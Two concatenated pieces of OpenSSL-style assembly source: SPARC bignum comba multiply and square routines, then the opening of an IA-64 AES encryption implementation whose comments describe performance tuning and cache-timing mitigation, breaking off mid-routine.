add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(11) !r[11]=c3;
or c_12,c_3,c_12 !=
mulx a_7,b_5,t_1 !mul_add_c(a[7],b[5],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_6,t_1 !mul_add_c(a[6],b[6],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_7,t_1 !mul_add_c(a[5],b[7],c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(12) !r[12]=c1;
or c_12,c_3,c_12 !=
mulx a_6,b_7,t_1 !mul_add_c(a[6],b[7],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_7,b_6,t_1 !mul_add_c(a[7],b[6],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
st t_1,rp(13) !r[13]=c2;
or c_12,c_3,c_12 !=
mulx a_7,b_7,t_1 !mul_add_c(a[7],b[7],c3,c1,c2);
addcc c_12,t_1,t_1
srlx t_1,32,c_12 !=
stuw t_1,rp(14) !r[14]=c3;
stuw c_12,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0 !=
.type bn_mul_comba8,#function
.size bn_mul_comba8,(.-bn_mul_comba8)
.align 32
.global bn_mul_comba4
/*
* void bn_mul_comba4(r,a,b)
* BN_ULONG *r,*a,*b;
*/
bn_mul_comba4:
save %sp,FRAME_SIZE,%sp
lduw ap(0),a_0
mov 1,t_2
lduw bp(0),b_0
sllx t_2,32,t_2 !=
lduw bp(1),b_1
mulx a_0,b_0,t_1 !mul_add_c(a[0],b[0],c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !=!r[0]=c1;
lduw ap(1),a_1
mulx a_0,b_1,t_1 !mul_add_c(a[0],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(2),a_2
mulx a_1,b_0,t_1 !=!mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(2),b_2 !=
mulx a_1,b_1,t_1 !mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(3),b_3
mulx a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12 !=
mulx a_0,b_3,t_1 !mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_2,t_1 !mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_0,t_1 !mul_add_c(a[3],b[0],c1,c2,c3);!=
addcc c_12,t_1,t_1 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(3) !=!r[3]=c1;
or c_12,c_3,c_12
mulx a_3,b_1,t_1 !mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,b_2,t_1 !mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,b_3,t_1 !mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_12,t_1,t_1 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !=!r[4]=c2;
or c_12,c_3,c_12
mulx a_2,b_3,t_1 !mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_12,t_1,t_1 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(5) !=!r[5]=c3;
or c_12,c_3,c_12
mulx a_3,b_3,t_1 !mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_12,t_1,t_1
srlx t_1,32,c_12 !=
stuw t_1,rp(6) !r[6]=c1;
stuw c_12,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_mul_comba4,#function
.size bn_mul_comba4,(.-bn_mul_comba4)
.align 32
.global bn_sqr_comba8
bn_sqr_comba8:
save %sp,FRAME_SIZE,%sp
mov 1,t_2
lduw ap(0),a_0
sllx t_2,32,t_2
lduw ap(1),a_1
mulx a_0,a_0,t_1 !sqr_add_c(a,0,c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !r[0]=c1;
lduw ap(2),a_2
mulx a_0,a_1,t_1 !=!sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12
mulx a_0,a_3,t_1 !sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(4),a_4
mulx a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
st t_1,rp(3) !r[3]=c1;
or c_12,c_3,c_12
mulx a_4,a_0,t_1 !sqr_add_c2(a,4,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(5),a_5
mulx a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !r[4]=c2;
or c_12,c_3,c_12
mulx a_0,a_5,t_1 !sqr_add_c2(a,5,0,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,a_4,t_1 !sqr_add_c2(a,4,1,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(6),a_6
mulx a_2,a_3,t_1 !sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(5) !r[5]=c3;
or c_12,c_3,c_12
mulx a_6,a_0,t_1 !sqr_add_c2(a,6,0,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_1,t_1 !sqr_add_c2(a,5,1,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,a_2,t_1 !sqr_add_c2(a,4,2,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(7),a_7
mulx a_3,a_3,t_1 !=!sqr_add_c(a,3,c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(6) !r[6]=c1;
or c_12,c_3,c_12
mulx a_0,a_7,t_1 !sqr_add_c2(a,7,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,a_6,t_1 !sqr_add_c2(a,6,1,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,a_5,t_1 !sqr_add_c2(a,5,2,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,a_4,t_1 !sqr_add_c2(a,4,3,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(7) !r[7]=c2;
or c_12,c_3,c_12
mulx a_7,a_1,t_1 !sqr_add_c2(a,7,1,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_6,a_2,t_1 !sqr_add_c2(a,6,2,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_3,t_1 !sqr_add_c2(a,5,3,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,a_4,t_1 !sqr_add_c(a,4,c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(8) !r[8]=c3;
or c_12,c_3,c_12
mulx a_2,a_7,t_1 !sqr_add_c2(a,7,2,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,a_6,t_1 !sqr_add_c2(a,6,3,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,a_5,t_1 !sqr_add_c2(a,5,4,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(9) !r[9]=c1;
or c_12,c_3,c_12
mulx a_7,a_3,t_1 !sqr_add_c2(a,7,3,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_6,a_4,t_1 !sqr_add_c2(a,6,4,c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_5,t_1 !sqr_add_c(a,5,c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(10) !r[10]=c2;
or c_12,c_3,c_12
mulx a_4,a_7,t_1 !sqr_add_c2(a,7,4,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,a_6,t_1 !sqr_add_c2(a,6,5,c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(11) !r[11]=c3;
or c_12,c_3,c_12
mulx a_7,a_5,t_1 !sqr_add_c2(a,7,5,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_6,a_6,t_1 !sqr_add_c(a,6,c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(12) !r[12]=c1;
or c_12,c_3,c_12
mulx a_6,a_7,t_1 !sqr_add_c2(a,7,6,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(13) !r[13]=c2;
or c_12,c_3,c_12
mulx a_7,a_7,t_1 !sqr_add_c(a,7,c3,c1,c2);
addcc c_12,t_1,t_1
srlx t_1,32,c_12
stuw t_1,rp(14) !r[14]=c3;
stuw c_12,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba8,#function
.size bn_sqr_comba8,(.-bn_sqr_comba8)
.align 32
.global bn_sqr_comba4
/*
* void bn_sqr_comba4(r,a)
* BN_ULONG *r,*a;
*/
bn_sqr_comba4:
save %sp,FRAME_SIZE,%sp
mov 1,t_2
lduw ap(0),a_0
sllx t_2,32,t_2
lduw ap(1),a_1
mulx a_0,a_0,t_1 !sqr_add_c(a,0,c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !r[0]=c1;
lduw ap(2),a_2
mulx a_0,a_1,t_1 !sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12
mulx a_0,a_3,t_1 !sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(3) !r[3]=c1;
or c_12,c_3,c_12
mulx a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !r[4]=c2;
or c_12,c_3,c_12
mulx a_2,a_3,t_1 !sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(5) !r[5]=c3;
or c_12,c_3,c_12
mulx a_3,a_3,t_1 !sqr_add_c(a,3,c1,c2,c3);
addcc c_12,t_1,t_1
srlx t_1,32,c_12
stuw t_1,rp(6) !r[6]=c1;
stuw c_12,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba4,#function
.size bn_sqr_comba4,(.-bn_sqr_comba4)
.align 32
|
AIFM-sys/AIFM
| 41,292
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/aes/asm/aes-ia64.S
|
// ====================================================================
// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
// project. Rights for redistribution and usage in source and binary
// forms are granted according to the OpenSSL license.
// ====================================================================
//
// What's wrong with compiler generated code? Compiler never uses
// variable 'shr' which is pairable with 'extr'/'dep' instructions.
// Then it uses 'zxt' which is an I-type, but can be replaced with
// 'and' which in turn can be assigned to M-port [there're double as
// much M-ports as there're I-ports on Itanium 2]. By sacrificing few
// registers for small constants (255, 24 and 16) to be used with
// 'shr' and 'and' instructions I can achieve better ILP, Intruction
// Level Parallelism, and performance. This code outperforms GCC 3.3
// generated code by over factor of 2 (two), GCC 3.4 - by 70% and
// HP C - by 40%. Measured best-case scenario, i.e. aligned
// big-endian input, ECB timing on Itanium 2 is (18 + 13*rounds)
// ticks per block, or 9.25 CPU cycles per byte for 128 bit key.
// Version 1.2 mitigates the hazard of cache-timing attacks by
// a) compressing S-boxes from 8KB to 2KB+256B, b) scheduling
// references to S-boxes for L2 cache latency, c) prefetching T[ed]4
// prior last round. As result performance dropped to (26 + 15*rounds)
// ticks per block or 11 cycles per byte processed with 128-bit key.
// This is ~16% deterioration. For reference Itanium 2 L1 cache has
// 64 bytes line size and L2 - 128 bytes...
.ident "aes-ia64.S, version 1.2"
.ident "IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
.explicit
.text
rk0=r8; rk1=r9;
pfssave=r2;
lcsave=r10;
prsave=r3;
maskff=r11;
twenty4=r14;
sixteen=r15;
te00=r16; te11=r17; te22=r18; te33=r19;
te01=r20; te12=r21; te23=r22; te30=r23;
te02=r24; te13=r25; te20=r26; te31=r27;
te03=r28; te10=r29; te21=r30; te32=r31;
// these are rotating...
t0=r32; s0=r33;
t1=r34; s1=r35;
t2=r36; s2=r37;
t3=r38; s3=r39;
te0=r40; te1=r41; te2=r42; te3=r43;
#if defined(_HPUX_SOURCE) && !defined(_LP64)
# define ADDP addp4
#else
# define ADDP add
#endif
// Offsets from Te0
#define TE0 0
#define TE2 2
#if defined(_HPUX_SOURCE) || defined(B_ENDIAN)
#define TE1 3
#define TE3 1
#else
#define TE1 1
#define TE3 3
#endif
// This implies that AES_KEY comprises 32-bit key schedule elements
// even on LP64 platforms.
#ifndef KSZ
# define KSZ 4
# define LDKEY ld4
#endif
.proc _ia64_AES_encrypt#
// Input: rk0-rk1
// te0
// te3 as AES_KEY->rounds!!!
// s0-s3
// maskff,twenty4,sixteen
// Output: r16,r20,r24,r28 as s0-s3
// Clobber: r16-r31,rk0-rk1,r32-r43
.align 32
_ia64_AES_encrypt:
.prologue
.altrp b6
.body
{ .mmi; alloc r16=ar.pfs,12,0,0,8
LDKEY t0=[rk0],2*KSZ
mov pr.rot=1<<16 }
{ .mmi; LDKEY t1=[rk1],2*KSZ
add te1=TE1,te0
add te3=-3,te3 };;
{ .mib; LDKEY t2=[rk0],2*KSZ
mov ar.ec=2 }
{ .mib; LDKEY t3=[rk1],2*KSZ
add te2=TE2,te0
brp.loop.imp .Le_top,.Le_end-16 };;
{ .mmi; xor s0=s0,t0
xor s1=s1,t1
mov ar.lc=te3 }
{ .mmi; xor s2=s2,t2
xor s3=s3,t3
add te3=TE3,te0 };;
.align 32
.Le_top:
{ .mmi; (p0) LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
(p0) and te33=s3,maskff // 0/0:s3&0xff
(p0) extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; (p0) LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
(p0) and te30=s0,maskff // 0/1:s0&0xff
(p0) shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; (p0) LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
(p0) shladd te33=te33,3,te3 // 1/0:te0+s0>>24
(p0) extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; (p0) LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
(p0) shladd te30=te30,3,te3 // 1/1:te3+s0
(p0) shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; (p0) ld4 te33=[te33] // 2/0:te3[s3&0xff]
(p0) shladd te22=te22,3,te2 // 2/0:te2+s2>>8&0xff
(p0) extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; (p0) ld4 te30=[te30] // 2/1:te3[s0]
(p0) shladd te23=te23,3,te2 // 2/1:te2+s3>>8
(p0) shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; (p0) ld4 te22=[te22] // 3/0:te2[s2>>8]
(p0) shladd te20=te20,3,te2 // 3/2:te2+s0>>8
(p0) extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; (p0) ld4 te23=[te23] // 3/1:te2[s3>>8]
(p0) shladd te00=te00,3,te0 // 3/0:te0+s0>>24
(p0) shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; (p0) ld4 te20=[te20] // 4/2:te2[s0>>8]
(p0) shladd te21=te21,3,te2 // 4/3:te3+s2
(p0) extr.u te11=s1,16,8 } // 4/0:s1>>16&0xff
{ .mmi; (p0) ld4 te00=[te00] // 4/0:te0[s0>>24]
(p0) shladd te01=te01,3,te0 // 4/1:te0+s1>>24
(p0) shr.u te13=s3,sixteen };; // 4/2:s3>>16
{ .mmi; (p0) ld4 te21=[te21] // 5/3:te2[s1>>8]
(p0) shladd te11=te11,3,te1 // 5/0:te1+s1>>16
(p0) extr.u te12=s2,16,8 } // 5/1:s2>>16&0xff
{ .mmi; (p0) ld4 te01=[te01] // 5/1:te0[s1>>24]
(p0) shladd te02=te02,3,te0 // 5/2:te0+s2>>24
(p0) and te31=s1,maskff };; // 5/2:s1&0xff
{ .mmi; (p0) ld4 te11=[te11] // 6/0:te1[s1>>16]
(p0) shladd te12=te12,3,te1 // 6/1:te1+s2>>16
(p0) extr.u te10=s0,16,8 } // 6/3:s0>>16&0xff
{ .mmi; (p0) ld4 te02=[te02] // 6/2:te0[s2>>24]
(p0) shladd te03=te03,3,te0 // 6/3:te1+s0>>16
(p0) and te32=s2,maskff };; // 6/3:s2&0xff
{ .mmi; (p0) ld4 te12=[te12] // 7/1:te1[s2>>16]
(p0) shladd te31=te31,3,te3 // 7/2:te3+s1&0xff
(p0) and te13=te13,maskff} // 7/2:s3>>16&0xff
{ .mmi; (p0) ld4 te03=[te03] // 7/3:te0[s3>>24]
(p0) shladd te32=te32,3,te3 // 7/3:te3+s2
(p0) xor t0=t0,te33 };; // 7/0:
{ .mmi; (p0) ld4 te31=[te31] // 8/2:te3[s1]
(p0) shladd te13=te13,3,te1 // 8/2:te1+s3>>16
(p0) xor t0=t0,te22 } // 8/0:
{ .mmi; (p0) ld4 te32=[te32] // 8/3:te3[s2]
(p0) shladd te10=te10,3,te1 // 8/3:te1+s0>>16
(p0) xor t1=t1,te30 };; // 8/1:
{ .mmi; (p0) ld4 te13=[te13] // 9/2:te1[s3>>16]
(p0) ld4 te10=[te10] // 9/3:te1[s0>>16]
(p0) xor t0=t0,te00 };; // 9/0: !L2 scheduling
{ .mmi; (p0) xor t1=t1,te23 // 10[9]/1:
(p0) xor t2=t2,te20 // 10[9]/2:
(p0) xor t3=t3,te21 };; // 10[9]/3:
{ .mmi; (p0) xor t0=t0,te11 // 11[10]/0:done!
(p0) xor t1=t1,te01 // 11[10]/1:
(p0) xor t2=t2,te02 };; // 11[10]/2: !L2 scheduling
{ .mmi; (p0) xor t3=t3,te03 // 12[10]/3:
(p16) cmp.eq p0,p17=r0,r0 };; // 12[10]/clear (p17)
{ .mmi; (p0) xor t1=t1,te12 // 13[11]/1:done!
(p0) xor t2=t2,te31 // 13[11]/2:
(p0) xor t3=t3,te32 } // 13[11]/3:
{ .mmi; (p17) add te0=2048,te0 // 13[11]/
(p17) add te1=2048+64-TE1,te1};; // 13[11]/
{ .mib; (p0) xor t2=t2,te13 // 14[12]/2:done!
(p17) add te2=2048+128-TE2,te2} // 14[12]/
{ .mib; (p0) xor t3=t3,te10 // 14[12]/3:done!
(p17) add te3=2048+192-TE3,te3 // 14[12]/
br.ctop.sptk .Le_top };;
.Le_end:
{ .mmi; ld8 te12=[te0] // prefetch Te4
ld8 te31=[te1] }
{ .mmi; ld8 te10=[te2]
ld8 te32=[te3] }
{ .mmi; LDKEY t0=[rk0],2*KSZ // 0/0:rk[0]
and te33=s3,maskff // 0/0:s3&0xff
extr.u te22=s2,8,8 } // 0/0:s2>>8&0xff
{ .mmi; LDKEY t1=[rk1],2*KSZ // 0/1:rk[1]
and te30=s0,maskff // 0/1:s0&0xff
shr.u te00=s0,twenty4 };; // 0/0:s0>>24
{ .mmi; LDKEY t2=[rk0],2*KSZ // 1/2:rk[2]
add te33=te33,te0 // 1/0:te0+s0>>24
extr.u te23=s3,8,8 } // 1/1:s3>>8&0xff
{ .mmi; LDKEY t3=[rk1],2*KSZ // 1/3:rk[3]
add te30=te30,te0 // 1/1:te0+s0
shr.u te01=s1,twenty4 };; // 1/1:s1>>24
{ .mmi; ld1 te33=[te33] // 2/0:te0[s3&0xff]
add te22=te22,te0 // 2/0:te0+s2>>8&0xff
extr.u te20=s0,8,8 } // 2/2:s0>>8&0xff
{ .mmi; ld1 te30=[te30] // 2/1:te0[s0]
add te23=te23,te0 // 2/1:te0+s3>>8
shr.u te02=s2,twenty4 };; // 2/2:s2>>24
{ .mmi; ld1 te22=[te22] // 3/0:te0[s2>>8]
add te20=te20,te0 // 3/2:te0+s0>>8
extr.u te21=s1,8,8 } // 3/3:s1>>8&0xff
{ .mmi; ld1 te23=[te23] // 3/1:te0[s3>>8]
add te00=te00,te0 // 3/0:te0+s0>>24
shr.u te03=s3,twenty4 };; // 3/3:s3>>24
{ .mmi; ld1 te20=[te20] // 4/2:te0[s0>>8]
add te21=te21,te0 // 4/3:te0+s2
extr.u te11=s1,16,8 } // 4/0:s1>>16&0xff
{ .mmi; ld1 te00=[te00] // 4/0:te0[s0>>24]
add te01=te01,te0 // 4/1:te0+s1>>24
shr.u te13=s3,sixteen };; // 4/2:s3>>16
{ .mmi; ld1 te21=[te21] // 5/3:te0[s1>>8]
add te11=te11,te0 // 5/0:te0+s1>>16
extr.u te12=s2,16,8 } // 5/1:s2>>16&0xff
{ .mmi; ld1 te01=[te01] // 5/1:te0[s1>>24]
add te02=te02,te0 // 5/2:te0+s2>>24
and te31=s1,maskff };; // 5/2:s1&0xff
{ .mmi; ld1 te11=[te11] // 6/0:te0[s1>>16]
add te12=te12,te0 // 6/1:te0+s2>>16
extr.u te10=s0,16,8 } // 6/3:s0>>16&0xff
{ .mmi; ld1 te02=[te02] // 6/2:te0[s2>>24]
add te03=te03,te0 // 6/3:te0+s0>>16
and te32=s2,maskff };; // 6/3:s2&0xff
{ .mmi; ld1 te12=[te12] // 7/1:te0[s2>>16]
add te31=te31,te0 // 7/2:te0+s1&0xff
dep te33=te22,te33,8,8} // 7/0:
